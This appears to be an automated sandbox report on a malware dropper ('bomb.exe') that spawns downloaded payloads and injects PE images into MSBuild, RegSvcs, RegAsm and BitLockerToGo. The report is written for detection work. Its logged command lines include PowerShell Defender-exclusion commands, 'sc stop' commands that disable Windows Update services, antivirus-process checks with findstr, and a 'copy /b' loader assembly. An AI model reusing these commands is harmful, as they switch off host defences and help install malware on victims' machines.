Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2370000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_0040F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

8_2_0040F54A

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2370000 value starts with: 4D5A

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		8_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		8_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1075008	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 450000	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 462000	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 469000	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 46A000	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BEF008	Jump to behavior
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 104A008
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CAC008
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 446000
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 456000
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2370000
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2574008

Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe "C:\Users\user\Desktop\http185.215.113.66pei.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe "C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe "C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe "C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe "C:\Users\user\Desktop\http77.105.161.194file1.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe "C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe "C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe "C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe "C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe "C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 400445	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7112 -ip 7112
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 280
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tits Tits.bat & Tits.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 400445
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "navyfurthermoreacceptableinvestigator" Profession
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Atmospheric + ..\Commons + ..\Represent + ..\Humans + ..\Href + ..\Router + ..\Connection + ..\Sol O
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\400445\Batch.pif Batch.pif O
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\sysvplervcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Users\user\sysvplervcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Process created: unknown unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_67D04760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

8_2_67D04760

Source: Batch.pif, 00000020.00000000.1966382729.0000000001046000.00000002.00000001.01000000.00000017.sdmp

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe

Code function: 5_2_00F0907E cpuid

5_2_00F0907E

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: GetLocaleInfoA,strcmp,	4_2_0040F1B0
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: GetLocaleInfoW,LdrInitializeThunk,	5_2_00EFA0D7
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: GetLocaleInfoW,	5_2_00EF203C
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_00EFA200
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,LdrInitializeThunk,__calloc_crt,___crtGetLocaleInfoA,LdrInitializeThunk,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	5_2_00F2D3E3
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: GetUserDefaultLCID,IsValidCodePage,LdrInitializeThunk,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00EFA3D5
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: GetLocaleInfoW,	5_2_00EFA306
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_00F2F576
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	5_2_00EF9A71
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: LdrInitializeThunk,__calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	5_2_00F31A50
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: LdrInitializeThunk,EnumSystemLocalesW,	5_2_00EF1B92
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,LdrInitializeThunk,__calloc_crt,LdrInitializeThunk,__calloc_crt,LdrInitializeThunk,__calloc_crt,LdrInitializeThunk,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	5_2_00F32B40
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: LdrInitializeThunk,EnumSystemLocalesW,	5_2_00EF9DF9
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	5_2_00F30DC4
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: LdrInitializeThunk,__calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	5_2_00F31D6E
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: LdrInitializeThunk,EnumSystemLocalesW,	5_2_00EF9D5E
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: LdrInitializeThunk,EnumSystemLocalesW,	5_2_00EF9D13
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,LdrInitializeThunk,	5_2_00EF9E84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	8_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_0042B1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	8_2_0042B2E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	8_2_00429B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	8_2_0042B3E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	8_2_0042B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	8_2_0042AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	8_2_00425503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	8_2_0042B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	8_2_004275BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesA,	8_2_0042B676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	8_2_00428EE4
